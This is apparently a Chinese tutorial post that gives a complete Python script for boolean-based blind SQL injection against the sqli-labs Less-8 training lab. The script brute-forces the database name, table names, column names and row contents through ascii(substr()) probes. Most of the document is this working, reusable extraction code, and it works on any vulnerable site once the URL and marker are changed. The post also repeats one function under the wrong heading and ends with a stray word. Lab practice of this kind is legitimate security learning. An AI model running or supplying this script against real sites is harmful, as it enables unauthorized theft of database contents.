sql盲注脚本

例子 sql-labs /Less-8

需要模块 requests

基本思路 判断页面是否是正确页面→判断数据库长度 → 爆破数据库名 → 判断表的个数 → 判断每个表的长度 → 爆破每个表的表名 → 判断字段的个数 → 判断每个字段的长度 → 爆破字段名 → 判断每个字段有多少条内容 → 判断内容的长度 → 爆破字段的内容 

判断页面是否是正确页面

def get_html(url):
    """Return True if the page fetched from ``url`` contains ``"You are in"``.

    This is the boolean oracle used by every probe in the file: the marker is
    the keyword the lab page shows when the injected condition is true.  The
    request carries the module-level ``headers`` dict set under ``__main__``.
    Each call is one HTTP GET with no timeout, so a stalled server blocks the
    whole run; a complete run issues hundreds of GETs that differ only in the
    query-string suffix, which is the traffic pattern server-side logging or a
    WAF rule would key on.
    """
    marker = "You are in"
    page = requests.get(url=url, headers=headers).text
    return marker in page

判断数据库长度

def get_databaseNL():
    """Probe ``length(database())`` for 1..20 and return the first accepted length.

    If no probe matches, the loop variable keeps its final value and 20 is
    returned, which callers cannot tell apart from a real length of 20.
    Reads the module-level ``url`` and calls ``get_html``.
    """
    probe = " and length(database())=%s --+"
    for num in range(1, 21):
        if get_html(url + probe % num):
            break
    return num

爆破数据库名

def get_databaseName(num):
    """Recover the database name character by character; ``num`` is its length.

    For each position 1..num, codes 38..125 are probed with
    ``ascii(substr(database(), pos, 1)) = code`` and the first accepted code is
    kept.  Every accepted character is appended both to the returned string
    and to the module-level ``list1`` (``__main__`` reads ``list1`` rather than
    the return value).  A position where no code matches is silently skipped,
    so the result may be shorter than ``num``.
    """
    dbname = ""
    for i in range(1, num + 1):
        for j in range(38, 126):
            # One-character equality probe; the trailing '--+' comments out the
            # rest of the query once the '+' is decoded as a space.
            getinfo = " and ascii(substr(database(),%s,1))=%s --+" % (i, j)
            fullurl = url + getinfo
            if get_html(fullurl):
                dbname += chr(j)
                list1.append(chr(j))
                break  # move on to the next position
    return dbname

判断表的个数

def get_databasenumber(dbname):
    """Return how many tables ``information_schema`` lists for schema ``dbname``.

    Counts 1..39 are probed in turn; if none is accepted the loop variable
    keeps its final value and 39 is returned.  ``dbname`` is interpolated into
    the probe verbatim, so it is expected to be the plain schema name that
    ``get_databaseName`` recovered.
    """
    probe = (
        "and (select count(table_name) from information_schema.tables "
        f"where table_schema='{dbname}') =%s --+"
    )
    for number1 in range(1, 40):
        if get_html(url + probe % number1):
            break
    return number1

判断表的长度以及爆表名

def get_databasetablesnumber(dbname,number1):
    """Recover the names of the ``number1`` tables in schema ``dbname``.

    For each table index ``a`` (``limit a,1``) the lengths 1..9 are probed;
    once a length ``b`` is accepted, positions 0..b are probed against codes
    38..125 and accepted characters accumulate in ``tablename``.  When the
    buffer reaches length ``b`` it is pushed onto the module-level ``list2``
    and reset, so the return value is normally "" (a partial name only if a
    character was missed).  ``__main__`` reads ``list2``.

    NOTE(review): the paste lost its indentation; the layout below is
    inferred, with the ``break`` inside ``if get_html(swei)`` so a hit ends the
    ASCII loop.  Position 0 is probed although substr() positions start at 1,
    and the length loop stops at 9 -- both read as defects rather than intent.
    """
    tablename=""
    for a in range(0,number1):  # one pass per table (limit a,1)
        for b in range(1,10):  # candidate name length 1..9
            wes= f" and length(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),1))={b} --+"
            inurl1=url+wes
            if get_html(inurl1):
                for qweq in range(0,b+1):  # character position
                    for item in range(38, 126):  # candidate ASCII code
                        wei=f" and ascii(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),{qweq},1))={item} --+"
                        swei=url+wei
                        if get_html(swei):
                            "拼接表名"  # bare string literal: a no-op, left in place
                            tablename += chr(item)
                            if len(tablename) == b :
                                list2.append(tablename)
                                tablename=""
                            break
    return tablename

判断字段的个数

def get_cloumnsnumber(dbname):
    """Return how many columns ``information_schema.columns`` lists for a table.

    Despite the parameter name, ``dbname`` is used as a *table* name (the
    ``__main__`` block passes the table chosen at the prompt).  The probe
    filters on ``table_name`` only, not ``table_schema``, so same-named tables
    in other schemas would add to the count.  Counts 0..39 are tried; if none
    matches, the loop variable keeps its final value and 39 is returned.
    """
    probe = (
        " and (select count(column_name) from information_schema.columns "
        f"where table_name='{dbname}') = %s --+ "
    )
    for number2 in range(0, 40):
        if get_html(url + probe % number2):
            break
    return number2

判断字段的长度及爆破列名

def get_len(name,name1,name2):
    """Dump the values of column ``name`` in table ``name1.name2`` into ``list4``.

    Reads the module-level ``cse`` (the count from ``get_count``) and probes
    row offsets 0..cse inclusive -- one more than the count; the extra
    ``limit`` offset should simply produce no match.  For each row, lengths
    1..49 are probed; once one is accepted, positions 1..length are probed
    against codes 38..125 and each hit is appended to ``passname``.  A
    completed value is pushed onto ``list4`` and the buffer reset.  The return
    value is only the final state of the length loop variable and is ignored
    by ``__main__``.

    NOTE(review): this snippet sits under the heading for column-name brute
    forcing but is a copy of ``get_len`` (the content dump); the function that
    ``__main__`` calls for column names, ``get_columnname``, appears only in
    the full listing at the end of the post.  Indentation was lost in the
    paste; the layout below is inferred, with the ``break`` inside
    ``if get_html(cyurl)``.
    """
    passname = ''
    for cloum in range(0,cse+1):  # row offset for `limit cloum,1`; cse is module-level
        for number4 in range(1,50):  # candidate value length 1..49
            wwwes=f'and length(substr( (select {name} from {name1}.{name2} limit {cloum},1),1)) ={number4} --+'
            wers=url+wwwes
            if get_html(wers):
                for we in range(1, number4 + 1):  # character position (1-based)
                    for lng in range(38,126):  # candidate ASCII code
                        waxyls = f'and ascii(substr((select {name} from {name1}.{name2} limit {cloum},1),{we},1))={lng} --+'
                        cyurl = url + waxyls
                        if get_html(cyurl):
                            passname += chr(lng)
                            if len(passname) == number4:
                                list4.append(passname)
                                passname = ''
                            break
    return number4

判断每个字段里面内容的条数

def get_count(ll,ls,lw):
    """Return the ``count(ll)`` value the oracle accepts for table ``ls.lw``.

    ``ll`` is the column, ``ls`` the schema and ``lw`` the table, all
    interpolated verbatim.  Counts 1..19 are probed; if none is accepted the
    loop variable keeps its final value and 19 is returned.
    """
    probe = f'and (select count({ll}) from {ls}.{lw})=%s --+'
    for cyy in range(1, 20):
        if get_html(url + probe % cyy):
            break
    return cyy

判断字段长度及字段内容

def get_len(name,name1,name2):
    """Dump the values of column ``name`` in table ``name1.name2`` into ``list4``.

    Reads the module-level ``cse`` (the count from ``get_count``) and probes
    row offsets 0..cse inclusive -- one more than the count; the extra
    ``limit`` offset should simply produce no match.  For each row, lengths
    1..49 are probed; once one is accepted, positions 1..length are probed
    against codes 38..125 and each hit is appended to ``passname``.  A
    completed value is pushed onto ``list4`` and the buffer reset.  The return
    value is only the final state of the length loop variable and is ignored
    by ``__main__``.

    NOTE(review): indentation was lost in the paste; the layout below is
    inferred, with the ``break`` inside ``if get_html(cyurl)``.
    """
    passname = ''
    for cloum in range(0,cse+1):  # row offset for `limit cloum,1`; cse is module-level
        for number4 in range(1,50):  # candidate value length 1..49
            wwwes=f'and length(substr( (select {name} from {name1}.{name2} limit {cloum},1),1)) ={number4} --+'
            wers=url+wwwes
            if get_html(wers):
                for we in range(1, number4 + 1):  # character position (1-based)
                    for lng in range(38,126):  # candidate ASCII code
                        waxyls = f'and ascii(substr((select {name} from {name1}.{name2} limit {cloum},1),{we},1))={lng} --+'
                        cyurl = url + waxyls
                        if get_html(cyurl):
                            passname += chr(lng)
                            if len(passname) == number4:
                                list4.append(passname)
                                passname = ''
                            break
    return number4

调用部分

if __name__ == "__main__":
    # Lab target from the post (sqli-labs Less-8); the quote after id=1 closes
    # the injected parameter.  Every probe function appends its suffix to this.
    url = "http://sql1/Less-8/?id=1'"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"}  # step 2: headers sent with every probe
    # Step 1: database name.  The return value of get_databaseName is
    # discarded; the name is rebuilt from the characters it pushed onto list1.
    awt=get_databaseNL()
    print('数据库长度为',awt)
    get_databaseName(awt)
    c = "".join(list1)
    print('数据库名为',c)
    # Step 2: tables.  get_databasenumber(c) is evaluated twice, repeating the
    # whole count probe.  get_databasetablesnumber normally returns "", so the
    # print shows an empty line; the names are in list2 (the "库名" label
    # actually prints the table list).
    print('该库下一共有',get_databasenumber(c),'个表')
    print(get_databasetablesnumber(c,get_databasenumber(c)))
    print("库名",list2)
    # Step 3: interactive loop -- pick a table, list its columns, pick a
    # column, dump its values.  NOTE(review): indentation was lost in the
    # paste; everything after the first input() is assumed to be inside the
    # loop.  get_columnname is not defined in the walkthrough snippets above;
    # it appears only in the full listing at the end of the post.  `cse` is a
    # module-level name that get_len reads.
    while True:
        cloumns = input("请输入想要查询的表(输入q退出):")
        if cloumns == 'q' :
            break
        get_columnname(cloumns,get_cloumnsnumber(cloumns))

        print('列名',list3)
        list3=[]  # reset the shared buffer for the next table
        cyyin=input("请输入想查询的列(按e退出):")
        if cyyin == 'e':
            break
        cse=get_count(cyyin,c,cloumns)  # row count consumed by get_len via the global
        get_len(cyyin,c,cloumns)
        print(list4)
        list4=[]  # reset the shared buffer for the next column

总代码

import requests
# Shared result buffers filled by the probe functions and read in __main__:
# list1 -- database name characters, list2 -- table names,
# list3 -- column names, list4 -- dumped column values.
list1, list2, list3, list4 = [], [], [], []
def get_html(url):
    """Return True if the page fetched from ``url`` contains ``"You are in"``.

    This is the boolean oracle used by every probe in the file: the marker is
    the keyword the lab page shows when the injected condition is true.  The
    request carries the module-level ``headers`` dict set under ``__main__``.
    Each call is one HTTP GET with no timeout, so a stalled server blocks the
    whole run; a complete run issues hundreds of GETs that differ only in the
    query-string suffix, which is the traffic pattern server-side logging or a
    WAF rule would key on.
    """
    marker = "You are in"
    page = requests.get(url=url, headers=headers).text
    return marker in page


def get_databaseNL():
    """Probe ``length(database())`` for 1..20 and return the first accepted length.

    If no probe matches, the loop variable keeps its final value and 20 is
    returned, which callers cannot tell apart from a real length of 20.
    Reads the module-level ``url`` and calls ``get_html``.
    """
    probe = " and length(database())=%s --+"
    for num in range(1, 21):
        if get_html(url + probe % num):
            break
    return num


def get_databaseName(num):
    """Recover the database name character by character; ``num`` is its length.

    For each position 1..num, codes 38..125 are probed with
    ``ascii(substr(database(), pos, 1)) = code`` and the first accepted code is
    kept.  Every accepted character is appended both to the returned string
    and to the module-level ``list1`` (``__main__`` reads ``list1`` rather than
    the return value).  A position where no code matches is silently skipped,
    so the result may be shorter than ``num``.
    """
    dbname = ""
    for i in range(1, num + 1):
        for j in range(38, 126):
            # One-character equality probe; the trailing '--+' comments out the
            # rest of the query once the '+' is decoded as a space.
            getinfo = " and ascii(substr(database(),%s,1))=%s --+" % (i, j)
            fullurl = url + getinfo
            if get_html(fullurl):
                dbname += chr(j)
                list1.append(chr(j))
                break  # move on to the next position
    return dbname
def get_databasenumber(dbname):
    """Return how many tables ``information_schema`` lists for schema ``dbname``.

    Counts 1..39 are probed in turn; if none is accepted the loop variable
    keeps its final value and 39 is returned.  ``dbname`` is interpolated into
    the probe verbatim, so it is expected to be the plain schema name that
    ``get_databaseName`` recovered.
    """
    probe = (
        "and (select count(table_name) from information_schema.tables "
        f"where table_schema='{dbname}') =%s --+"
    )
    for number1 in range(1, 40):
        if get_html(url + probe % number1):
            break
    return number1
def get_databasetablesnumber(dbname,number1):
    """Recover the names of the ``number1`` tables in schema ``dbname``.

    For each table index ``a`` (``limit a,1``) the lengths 1..9 are probed;
    once a length ``b`` is accepted, positions 0..b are probed against codes
    38..125 and accepted characters accumulate in ``tablename``.  When the
    buffer reaches length ``b`` it is pushed onto the module-level ``list2``
    and reset, so the return value is normally "" (a partial name only if a
    character was missed).  ``__main__`` reads ``list2``.

    NOTE(review): the paste lost its indentation; the layout below is
    inferred, with the ``break`` inside ``if get_html(swei)`` so a hit ends the
    ASCII loop.  Position 0 is probed although substr() positions start at 1,
    and the length loop stops at 9 -- both read as defects rather than intent.
    """
    tablename=""
    for a in range(0,number1):  # one pass per table (limit a,1)
        for b in range(1,10):  # candidate name length 1..9
            wes= f" and length(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),1))={b} --+"
            inurl1=url+wes
            if get_html(inurl1):
                for qweq in range(0,b+1):  # character position
                    for item in range(38, 126):  # candidate ASCII code
                        wei=f" and ascii(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),{qweq},1))={item} --+"
                        swei=url+wei
                        if get_html(swei):
                            "拼接表名"  # bare string literal: a no-op, left in place
                            tablename += chr(item)
                            if len(tablename) == b :
                                list2.append(tablename)
                                tablename=""
                            break
    return tablename
def get_cloumnsnumber(dbname):
    """Return how many columns ``information_schema.columns`` lists for a table.

    Despite the parameter name, ``dbname`` is used as a *table* name (the
    ``__main__`` block passes the table chosen at the prompt).  The probe
    filters on ``table_name`` only, not ``table_schema``, so same-named tables
    in other schemas would add to the count.  Counts 0..39 are tried; if none
    matches, the loop variable keeps its final value and 39 is returned.
    """
    probe = (
        " and (select count(column_name) from information_schema.columns "
        f"where table_name='{dbname}') = %s --+ "
    )
    for number2 in range(0, 40):
        if get_html(url + probe % number2):
            break
    return number2
def get_columnname(cloumns,number3):
    """Recover the ``number3`` column names of table ``cloumns`` into ``list3``.

    For each column index (``limit czh,1``) the lengths 1..29 are probed; once
    one is accepted, positions 0..length are probed against codes 38..125 and
    hits accumulate in ``columnname``.  A completed name is pushed onto the
    module-level ``list3`` and the buffer reset, so the function normally
    returns "".  The lookup filters on ``table_name`` only, not
    ``table_schema``, so same-named tables in other schemas would contribute
    columns too.

    NOTE(review): indentation was lost in the paste; the layout below is
    inferred, with the ``break`` inside ``if get_html(swei)``.  Position 0 is
    probed although substr() positions start at 1.
    """
    columnname = ""
    for czh in range(0, number3):  # one pass per column (limit czh,1)
        for dwm in range(1, 30):  # candidate name length 1..29
            wes = f" and length(substr((select column_name from information_schema.columns where table_name ='{cloumns}' limit {czh},1),1)) = {dwm}--+ "
            # length probe
            inurl1 = url + wes
            if get_html(inurl1):
                for qweqe in range(0, dwm + 1):  # character position
                    for items in range(38, 126):  # candidate ASCII code
                        wei = f" and ascii(substr((select column_name from information_schema.columns where table_name='{cloumns}' limit {czh},1),{qweqe},1))={items} --+ "  # one-character equality probe
                        swei = url + wei
                        if get_html(swei):
                            columnname += chr(items)
                            if len(columnname) == dwm:
                                list3.append(columnname)
                                columnname = ""
                            break
    return columnname
def get_count(ll,ls,lw):
    """Return the ``count(ll)`` value the oracle accepts for table ``ls.lw``.

    ``ll`` is the column, ``ls`` the schema and ``lw`` the table, all
    interpolated verbatim.  Counts 1..19 are probed; if none is accepted the
    loop variable keeps its final value and 19 is returned.
    """
    probe = f'and (select count({ll}) from {ls}.{lw})=%s --+'
    for cyy in range(1, 20):
        if get_html(url + probe % cyy):
            break
    return cyy

def get_len(name,name1,name2):
    """Dump the values of column ``name`` in table ``name1.name2`` into ``list4``.

    Reads the module-level ``cse`` (the count from ``get_count``) and probes
    row offsets 0..cse inclusive -- one more than the count; the extra
    ``limit`` offset should simply produce no match.  For each row, lengths
    1..49 are probed; once one is accepted, positions 1..length are probed
    against codes 38..125 and each hit is appended to ``passname``.  A
    completed value is pushed onto ``list4`` and the buffer reset.  The return
    value is only the final state of the length loop variable and is ignored
    by ``__main__``.

    NOTE(review): indentation was lost in the paste; the layout below is
    inferred, with the ``break`` inside ``if get_html(cyurl)``.
    """
    passname = ''
    for cloum in range(0,cse+1):  # row offset for `limit cloum,1`; cse is module-level
        for number4 in range(1,50):  # candidate value length 1..49
            wwwes=f'and length(substr( (select {name} from {name1}.{name2} limit {cloum},1),1)) ={number4} --+'
            wers=url+wwwes
            if get_html(wers):
                for we in range(1, number4 + 1):  # character position (1-based)
                    for lng in range(38,126):  # candidate ASCII code
                        waxyls = f'and ascii(substr((select {name} from {name1}.{name2} limit {cloum},1),{we},1))={lng} --+'
                        cyurl = url + waxyls
                        if get_html(cyurl):
                            passname += chr(lng)
                            if len(passname) == number4:
                                list4.append(passname)
                                passname = ''
                            break
    return number4



if __name__ == "__main__":
    # Lab target from the post (sqli-labs Less-8); the quote after id=1 closes
    # the injected parameter.  Every probe function appends its suffix to this.
    url = "http://sql1/Less-8/?id=1'"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"}  # step 2: headers sent with every probe
    # Step 1: database name.  The return value of get_databaseName is
    # discarded; the name is rebuilt from the characters it pushed onto list1.
    awt=get_databaseNL()
    print('数据库长度为',awt)
    get_databaseName(awt)
    c = "".join(list1)
    print('数据库名为',c)
    # Step 2: tables.  get_databasenumber(c) is evaluated twice, repeating the
    # whole count probe.  get_databasetablesnumber normally returns "", so the
    # print shows an empty line; the names are in list2 (the "库名" label
    # actually prints the table list).
    print('该库下一共有',get_databasenumber(c),'个表')
    print(get_databasetablesnumber(c,get_databasenumber(c)))
    print("库名",list2)
    # Step 3: interactive loop -- pick a table, list its columns, pick a
    # column, dump its values.  NOTE(review): indentation was lost in the
    # paste; everything after the first input() is assumed to be inside the
    # loop.  `cse` is a module-level name that get_len reads.
    while True:
        cloumns = input("请输入想要查询的表(输入q退出):")
        if cloumns == 'q' :
            break
        get_columnname(cloumns,get_cloumnsnumber(cloumns))

        print('列名',list3)
        list3=[]  # reset the shared buffer for the next table
        cyyin=input("请输入想查询的列(按e退出):")
        if cyyin == 'e':
            break
        cse=get_count(cyyin,c,cloumns)  # row count consumed by get_len via the global
        get_len(cyyin,c,cloumns)
        print(list4)
        list4=[]  # reset the shared buffer for the next column

covfefe
